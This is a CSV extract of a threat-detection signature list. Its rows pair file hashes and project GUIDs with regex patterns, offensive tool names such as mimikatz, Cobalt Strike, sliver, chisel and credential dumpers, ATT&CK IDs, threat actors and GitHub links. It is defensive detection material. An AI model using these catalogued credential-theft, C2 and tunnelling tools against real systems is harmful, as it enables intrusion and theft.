"*510898a4922120a3e1e10c935f84e2f939a022b739afb38a42cb1b5e3a00172d*",".{0,1000}510898a4922120a3e1e10c935f84e2f939a022b739afb38a42cb1b5e3a00172d.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#filehash #linux","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","26548"
"*51093bb7f3a947ed390aa2a560dbe91621379ef2125582249a5769aa5a58b379*",".{0,1000}51093bb7f3a947ed390aa2a560dbe91621379ef2125582249a5769aa5a58b379.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","26549"
"*5109c0fda9b83cffa3c52a90801b96a37f5e874fd18c9d771dd943c304e9c750*",".{0,1000}5109c0fda9b83cffa3c52a90801b96a37f5e874fd18c9d771dd943c304e9c750.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","26550"
"*510c6896ab176ad04a534ed48a3c74957ca929accbaf277ee1d678eac6bf3b36*",".{0,1000}510c6896ab176ad04a534ed48a3c74957ca929accbaf277ee1d678eac6bf3b36.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#filehash","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","26552"
"*51166803b9409224e3c4cdd77b61002707eed020e3d3e03ffa4b03dfabf1f7e4*",".{0,1000}51166803b9409224e3c4cdd77b61002707eed020e3d3e03ffa4b03dfabf1f7e4.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","0","#filehash","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","26553"
"*5117731fa0ee6447f80940c0e41778b000e6ec53673ba2ab9c9eaf5234899592*",".{0,1000}5117731fa0ee6447f80940c0e41778b000e6ec53673ba2ab9c9eaf5234899592.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26554"
"*511cb881123380d9b669c7664aeef8fc9c1ddd1417488fbd1da57cdf0d803c9d*",".{0,1000}511cb881123380d9b669c7664aeef8fc9c1ddd1417488fbd1da57cdf0d803c9d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26555"
"*511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1*",".{0,1000}511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/","1","0","#filehash","webshell used with proxylogon exploitation","10","10","N/A","N/A","N/A","N/A","26556"
"*51200fbd06de3460053924b51d118c57db486f2579ebd402a961f7539dddf37d*",".{0,1000}51200fbd06de3460053924b51d118c57db486f2579ebd402a961f7539dddf37d.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26557"
"*5121c52bf1d468e8fcfffc35b724256275f7338a0fced44213e6e48fae889437*",".{0,1000}5121c52bf1d468e8fcfffc35b724256275f7338a0fced44213e6e48fae889437.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","26558"
"*512c31ebafb9013dfaf82b0123e088f976d3c1b57658ea60a7c8825a1c4bf7c7*",".{0,1000}512c31ebafb9013dfaf82b0123e088f976d3c1b57658ea60a7c8825a1c4bf7c7.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","26560"
"*512e079176dfe039a4692927ad7fbe518c944c28bb434add1118fef88a48029c*",".{0,1000}512e079176dfe039a4692927ad7fbe518c944c28bb434add1118fef88a48029c.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","#filehash","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","26561"
"*51357562490b7136ee89fa9aad7715f00c471bdd09c6d36c72eabf3da33db909*",".{0,1000}51357562490b7136ee89fa9aad7715f00c471bdd09c6d36c72eabf3da33db909.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","26564"
"*513c40085db62d92e26512d78a40e9f32466f45f563cde8cd6892f5b135e8aa0*",".{0,1000}513c40085db62d92e26512d78a40e9f32466f45f563cde8cd6892f5b135e8aa0.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26565"
"*51474db254eb9ee763f92372d5056aa268269e60d4b7d83cb340734c1c10ec65*",".{0,1000}51474db254eb9ee763f92372d5056aa268269e60d4b7d83cb340734c1c10ec65.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26567"
"*51479ff32cd7f2520a0b252fa3731361c3cc3288d6b0f7831b91a208cd91aaa3*",".{0,1000}51479ff32cd7f2520a0b252fa3731361c3cc3288d6b0f7831b91a208cd91aaa3.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","#filehash","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","26568"
"*5154b1146c48faca26e0276ce7fecb023e5d3d2b62d3e2157df51650ba834e23*",".{0,1000}5154b1146c48faca26e0276ce7fecb023e5d3d2b62d3e2157df51650ba834e23.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","26571"
"*515e62ccd2de0b47bce74fd7a039ca47390fee162eddec6b633bbc1a26662a86*",".{0,1000}515e62ccd2de0b47bce74fd7a039ca47390fee162eddec6b633bbc1a26662a86.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26573"
"*516280565958*",".{0,1000}516280565958.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","N/A","10","10","599","117","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z","26574"
"*516280565959*",".{0,1000}516280565959.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","N/A","10","10","599","117","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z","26575"
"*516387f97a4360654c232915fa5506013fc33f4b4e50e801b4a748070d5ffd3b*",".{0,1000}516387f97a4360654c232915fa5506013fc33f4b4e50e801b4a748070d5ffd3b.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","26576"
"*51650d59ffa17366d2190e05eb58c94975156449fce424f47cea328edcb561bf*",".{0,1000}51650d59ffa17366d2190e05eb58c94975156449fce424f47cea328edcb561bf.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#filehash","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","26577"
"*516763824343085c42dd86c02b55fdb57ce007b6f06014172ff8fe4bd8547351*",".{0,1000}516763824343085c42dd86c02b55fdb57ce007b6f06014172ff8fe4bd8547351.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26578"
"*516c132d30d40e8bc6177436077749f29a4862533bb5fa0be81e5d9936b98a04*",".{0,1000}516c132d30d40e8bc6177436077749f29a4862533bb5fa0be81e5d9936b98a04.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26579"
"*5176f4cdb10d1261d0327e76daf563a5dcc4e32b8556da761620bc1d467f002e*",".{0,1000}5176f4cdb10d1261d0327e76daf563a5dcc4e32b8556da761620bc1d467f002e.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","#filehash","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","26581"
"*518357a490ef4696125573bbeaa2d541f7733623b26e666da70bb16ffeafd8ed*",".{0,1000}518357a490ef4696125573bbeaa2d541f7733623b26e666da70bb16ffeafd8ed.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26582"
"*5185180b07473697f61c454d099076b300aaa04c418b97775f7bf70aa6289154*",".{0,1000}5185180b07473697f61c454d099076b300aaa04c418b97775f7bf70aa6289154.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26583"
"*518d6457e2d3e20e470f20b6399ce0f0ff5091dc6d2a0826d658247832ff4a8c*",".{0,1000}518d6457e2d3e20e470f20b6399ce0f0ff5091dc6d2a0826d658247832ff4a8c.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","#filehash","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","26584"
"*5191200b2b3d20b4e970acc72cca38d318ca463a88230580a426975a6f73bb49*",".{0,1000}5191200b2b3d20b4e970acc72cca38d318ca463a88230580a426975a6f73bb49.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","https://www.virustotal.com/gui/file/5191200b2b3d20b4e970acc72cca38d318ca463a88230580a426975a6f73bb49?nocache=1","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26585"
"*5193483fa2796f8c87502eb8efbd9f462dfaa8ea94e9ffdd28bfd2b569f8df54*",".{0,1000}5193483fa2796f8c87502eb8efbd9f462dfaa8ea94e9ffdd28bfd2b569f8df54.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","26587"
"*51960F7D-76FE-499F-AFBD-ACABD7BA50D1*",".{0,1000}51960F7D\-76FE\-499F\-AFBD\-ACABD7BA50D1.{0,1000}","offensive_tool_keyword","SharpCOM","DCOM Lateral Movement","T1175","TA0008","N/A","N/A","Lateral Movement","https://github.com/rvrsh3ll/SharpCOM","1","0","#GUIDproject","N/A","10","2","128","30","2019-09-16T22:52:53Z","2018-12-13T15:10:55Z","26588"
"*519637a04042d8869004121a6e80c35aa2b2370647de9604cbf3ac4eae79424b*",".{0,1000}519637a04042d8869004121a6e80c35aa2b2370647de9604cbf3ac4eae79424b.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","26589"
"*519ee1d48987fae9cd561d0b1c6d1f479b6264fa09991a2685ba372011af22f9*",".{0,1000}519ee1d48987fae9cd561d0b1c6d1f479b6264fa09991a2685ba372011af22f9.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26590"
"*51a6d7bd756ce8d9948c880374da754b32cc907cdb2e17132f247f4fd888c6e2*",".{0,1000}51a6d7bd756ce8d9948c880374da754b32cc907cdb2e17132f247f4fd888c6e2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26592"
"*51a9f54d470e4132709b0587618053d9bc4657d524e22fbe5e861264da5a627d*",".{0,1000}51a9f54d470e4132709b0587618053d9bc4657d524e22fbe5e861264da5a627d.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","26594"
"*51ac0a907de53723dc23b3e491fae8179f0cd77084a2362f429b9f76b6ae08b0*",".{0,1000}51ac0a907de53723dc23b3e491fae8179f0cd77084a2362f429b9f76b6ae08b0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26595"
"*51ae11608f904fb4fe9bc6ff63dacd0e318921b2aefcb81481106a1073205ae8*",".{0,1000}51ae11608f904fb4fe9bc6ff63dacd0e318921b2aefcb81481106a1073205ae8.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","26596"
"*51b43dfa1d70974cab183171c75ff06e39030a53f48a4a7dee31d392f34400a6*",".{0,1000}51b43dfa1d70974cab183171c75ff06e39030a53f48a4a7dee31d392f34400a6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26598"
"*51b6b45c74aa811864e33ce5c7717018a688a81e53dd71e52379fecf9b85eeff*",".{0,1000}51b6b45c74aa811864e33ce5c7717018a688a81e53dd71e52379fecf9b85eeff.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26599"
"*51b9750eff6966829371672c64e5bb4f36f336d99a66275c7008ef1edf2be19e*",".{0,1000}51b9750eff6966829371672c64e5bb4f36f336d99a66275c7008ef1edf2be19e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26601"
"*51c1957fed54412620774e2639cd42936d3141bc4c0c84ce6469c578d97e5deb*",".{0,1000}51c1957fed54412620774e2639cd42936d3141bc4c0c84ce6469c578d97e5deb.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","26602"
"*51C6E016-1428-441D-82E9-BB0EB599BBC8*",".{0,1000}51C6E016\-1428\-441D\-82E9\-BB0EB599BBC8.{0,1000}","offensive_tool_keyword","SharpHose","Asynchronous Password Spraying Tool in C# for Windows Environments","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/ustayready/SharpHose","1","0","#GUIDproject","N/A","10","4","312","62","2023-12-19T21:06:47Z","2020-05-01T22:10:49Z","26603"
